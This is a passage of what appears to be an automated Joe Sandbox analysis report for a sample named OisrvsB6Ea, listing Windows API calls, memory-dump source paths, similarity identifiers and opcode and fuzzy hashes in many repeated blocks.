                                                                                    • Part of subcall function 00276C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00276C54
                                                                                    • Part of subcall function 00276DCB: _wcschr.LIBVCRUNTIME ref: 00276E0A
                                                                                    • Part of subcall function 00276DCB: _wcschr.LIBVCRUNTIME ref: 00276E19
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                  • String ID: CreateThread failed
                                                                                  • API String ID: 2706921342-3849766595
                                                                                  • Opcode ID: bcdbd17c51cec546be18efddef06cfd74515d6ff459828303d6b7145b6005235
                                                                                  • Instruction ID: b32f01b3dedfd41165374c8a05f12d696be7b05283b4a036389fdd7c5ad65f02
                                                                                  • Opcode Fuzzy Hash: bcdbd17c51cec546be18efddef06cfd74515d6ff459828303d6b7145b6005235
                                                                                  • Instruction Fuzzy Hash: BB012B793253096FD3307E28AC59B76735CEB51791F20042EFA4A521C4CEA168B58724
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (($PDu<(
                                                                                  • API String ID: 1269201914-240991587
                                                                                  • Opcode ID: 8ef6531abbc7930c4222d8866184f26ce6c5911b47cb0b560db75142aba2f6d7
                                                                                  • Instruction ID: f5be18b63b977fb74de08109d573506aebee5e7871cae996e31d5316a036b55f
                                                                                  • Opcode Fuzzy Hash: 8ef6531abbc7930c4222d8866184f26ce6c5911b47cb0b560db75142aba2f6d7
                                                                                  • Instruction Fuzzy Hash: 79B0928927A0406D2508B2085902C3A050DC0C6F11371802EB804C01C0A8800C210A32
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: 2($PDu<(
                                                                                  • API String ID: 1269201914-723548999
                                                                                  • Opcode ID: dc26ef18bf76e3df5c45e859b84d9534207fa7111811876329352fab0ae0edad
                                                                                  • Instruction ID: cce712d7c6a13860f7cf7e78a51e89cb015b94fa06281240c3a95ac1a6ee1ee8
                                                                                  • Opcode Fuzzy Hash: dc26ef18bf76e3df5c45e859b84d9534207fa7111811876329352fab0ae0edad
                                                                                  • Instruction Fuzzy Hash: 5DB0928927A0007E2508B2085802D3A010DC4C2F11371802EF804C01C0A8800C200A32
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0027D343,00000001,?,?,?,00000000,0028551D,?,?,?), ref: 00279F9E
                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0028551D,?,?,?,?,?,00284FC7,?), ref: 00279FE5
                                                                                  • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0027D343,00000001,?,?), ref: 0027A011
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$Handle
                                                                                  • String ID:
                                                                                  • API String ID: 4209713984-0
                                                                                  • Opcode ID: e4c87f0a6f4728e7596816da0efd061fd189bb34c53f5044c306dd654886065b
                                                                                  • Instruction ID: 04b8790aaf584a0bd1cd566a916de96690687a7c2c12e98ccb2e3cf67cb2a3d0
                                                                                  • Opcode Fuzzy Hash: e4c87f0a6f4728e7596816da0efd061fd189bb34c53f5044c306dd654886065b
                                                                                  • Instruction Fuzzy Hash: DB31C231218306AFDB14CF24D818B6E77A5FFC5720F008919F94997290CB759DA8CBA3
                                                                                  APIs
                                                                                    • Part of subcall function 0027C27E: _wcslen.LIBCMT ref: 0027C284
                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A2D9
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A30C
                                                                                  • GetLastError.KERNEL32(?,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A329
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2260680371-0
                                                                                  • Opcode ID: d0ea8588bcb39dec9858286f4ddb4ca62de153d4bb6326ac400d197b27dd0490
                                                                                  • Instruction ID: 8d3dad69840fab4b57a36f08953b0e6bb1afd59cf44ffb9c712cb89d3d36fa1f
                                                                                  • Opcode Fuzzy Hash: d0ea8588bcb39dec9858286f4ddb4ca62de153d4bb6326ac400d197b27dd0490
                                                                                  • Instruction Fuzzy Hash: 4E01D8316242516AEF21AF755C09BFE3348AF4A7A0F04C455FD09D60C1DB74CAA1CAB3
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0029B8B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Info
                                                                                  • String ID:
                                                                                  • API String ID: 1807457897-3916222277
                                                                                  • Opcode ID: 86bf0a0d6cbb4dbc5f38e939f9d9a009a5d68c03790485509a533b922174e67d
                                                                                  • Instruction ID: e455465d8b8b4990b0bd7b251584629e6b21c546e6d36e406f6de89eb617600a
                                                                                  • Opcode Fuzzy Hash: 86bf0a0d6cbb4dbc5f38e939f9d9a009a5d68c03790485509a533b922174e67d
                                                                                  • Instruction Fuzzy Hash: 4A41177052438C9FEF228E24DD84BF6BBADEB55304F1404ECE59A87142D375AA55CF60
                                                                                  APIs
                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0029AFDD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: String
                                                                                  • String ID: LCMapStringEx
                                                                                  • API String ID: 2568140703-3893581201
                                                                                  • Opcode ID: 97d6accd17dfeed580ec659ed0d0aa989b780e7e7363479f5a80cef5bf537ddc
                                                                                  • Instruction ID: 07623b4be3067082e8c68b2e918968ac02ae0fe3610ef5dee9545c542bc45571
                                                                                  • Opcode Fuzzy Hash: 97d6accd17dfeed580ec659ed0d0aa989b780e7e7363479f5a80cef5bf537ddc
                                                                                  • Instruction Fuzzy Hash: A201E53251420AFBCF02AF90EC06DEE7F62EF4A754F014155FE1466160CA728A31AB95
                                                                                  APIs
                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0029A56F), ref: 0029AF55
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                  • String ID: InitializeCriticalSectionEx
                                                                                  • API String ID: 2593887523-3084827643
                                                                                  • Opcode ID: 95a1fb84b047af950d6ea0e4589ce68a5bda0b4b247d66503d4d6f692c03a9aa
                                                                                  • Instruction ID: 0f3c36e68e65876104168c59b714273e7192722010b7af301f2af937700dc310
                                                                                  • Opcode Fuzzy Hash: 95a1fb84b047af950d6ea0e4589ce68a5bda0b4b247d66503d4d6f692c03a9aa
                                                                                  • Instruction Fuzzy Hash: 1BF0E931655209BFCF119F50DC0ADAEBF61EF06711B004056FC089A260DE724E319BCA
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Alloc
                                                                                  • String ID: FlsAlloc
                                                                                  • API String ID: 2773662609-671089009
                                                                                  • Opcode ID: c2f9d5e6457f103a66d01acd839341e1bd1ec620d811e2cd4e13edb672e18487
                                                                                  • Instruction ID: ea302939cdc8e7abf4dc7f3063664b5c51f99824c635d1169f412c5e12f6d8bc
                                                                                  • Opcode Fuzzy Hash: c2f9d5e6457f103a66d01acd839341e1bd1ec620d811e2cd4e13edb672e18487
                                                                                  • Instruction Fuzzy Hash: 97E02B31765319BBCB01AB65EC06E6FBB54DB47721F0101ABFC05A7240CD705E2186DA
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: f6ac4ba13326f1d425f53b6bab747c1277ef8bcb04d14e02a09b01226e60bd22
                                                                                  • Instruction ID: 6d7daf96d3750377fa943b0bfd9cc870c1361367a671aec59319ac450b3ed116
                                                                                  • Opcode Fuzzy Hash: f6ac4ba13326f1d425f53b6bab747c1277ef8bcb04d14e02a09b01226e60bd22
                                                                                  • Instruction Fuzzy Hash: 81B092D937A142AD3504A2495846C3B020DC083B10331402AB809C01C09880AC200E32
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 362bf81192fa5de0dd1ba6f7709ee320ebe12619a8495fbed9bd8ff647152593
                                                                                  • Instruction ID: f9ce37b603f3b0f55c07205c89e728d91c3fbc2cc9ed88f49932dd5be6db66f1
                                                                                  • Opcode Fuzzy Hash: 362bf81192fa5de0dd1ba6f7709ee320ebe12619a8495fbed9bd8ff647152593
                                                                                  • Instruction Fuzzy Hash: 87B092DA37A001AD2504A2055806C3A021DC083B10331802AB809C02C09880AC240E32
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 7c659ff65078ef23ece1931c70ddc68f55cfd965bd0c6cc42cc334cd1ad23ff8
                                                                                  • Instruction ID: 1ac5482d2bba62063facad0e6a95ba51b39274c13a2fd4d343c296c36d628f1c
                                                                                  • Opcode Fuzzy Hash: 7c659ff65078ef23ece1931c70ddc68f55cfd965bd0c6cc42cc334cd1ad23ff8
                                                                                  • Instruction Fuzzy Hash: 99B092D937A141AD250472455846C3B020DC083B10331842AB809D04C09880AC200D32
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: ed8af4353f610a2e4c2b8a3e6afd3ff9f6a9a395b9459fe0072b9f270651e937
                                                                                  • Instruction ID: bd18fcd1008d3a41c4a40f504e28f8fcce183a4b5b5f85cfad17abdf86560df0
                                                                                  • Opcode Fuzzy Hash: ed8af4353f610a2e4c2b8a3e6afd3ff9f6a9a395b9459fe0072b9f270651e937
                                                                                  • Instruction Fuzzy Hash: 0AB092E937A101AD2544A2055806D3A020DC082B20331412AF809C01C09880AD600E32
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 2dd0ba6e045a33d3b7aeffd3e5bfae0ec070123ade3450b677787ed186bed849
                                                                                  • Instruction ID: 4ecbd0e6bcb120bf50a33ae64b47f803b6f8b00eafc8d62169f970418693575d
                                                                                  • Opcode Fuzzy Hash: 2dd0ba6e045a33d3b7aeffd3e5bfae0ec070123ade3450b677787ed186bed849
                                                                                  • Instruction Fuzzy Hash: A9B092E937A002AD3504A2069806D3A020DC082B20331402AB809C01C09880AD200E32
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 7db1a92680e93d7ead864b3905574935fea465f0b40f2fc5b6539e8782accc46
                                                                                  • Instruction ID: 50c0ff7d7804e9ff60b06798f5c42e1613d24760836ff066c490ccaeee03a458
                                                                                  • Opcode Fuzzy Hash: 7db1a92680e93d7ead864b3905574935fea465f0b40f2fc5b6539e8782accc46
                                                                                  • Instruction Fuzzy Hash: 28B092E937A001AD2504A2055906D3A020DC082B20331403AB809C01C0DC80AE210E32
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 62da32f2115baf27778d20222167b427f753ffa3f5c84d1e82b2c9c21357bb51
                                                                                  • Instruction ID: 28d1961c8e7ffec8d378c47a9c7b363204fd2fafebd31dcb119137040e6c6d71
                                                                                  • Opcode Fuzzy Hash: 62da32f2115baf27778d20222167b427f753ffa3f5c84d1e82b2c9c21357bb51
                                                                                  • Instruction Fuzzy Hash: E9B092DA37A001AD2504A2055906C3A021DC082B10331803AB809C02C09C90AD290E32
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028EAF9
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: 3Ro
                                                                                  • API String ID: 1269201914-1492261280
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
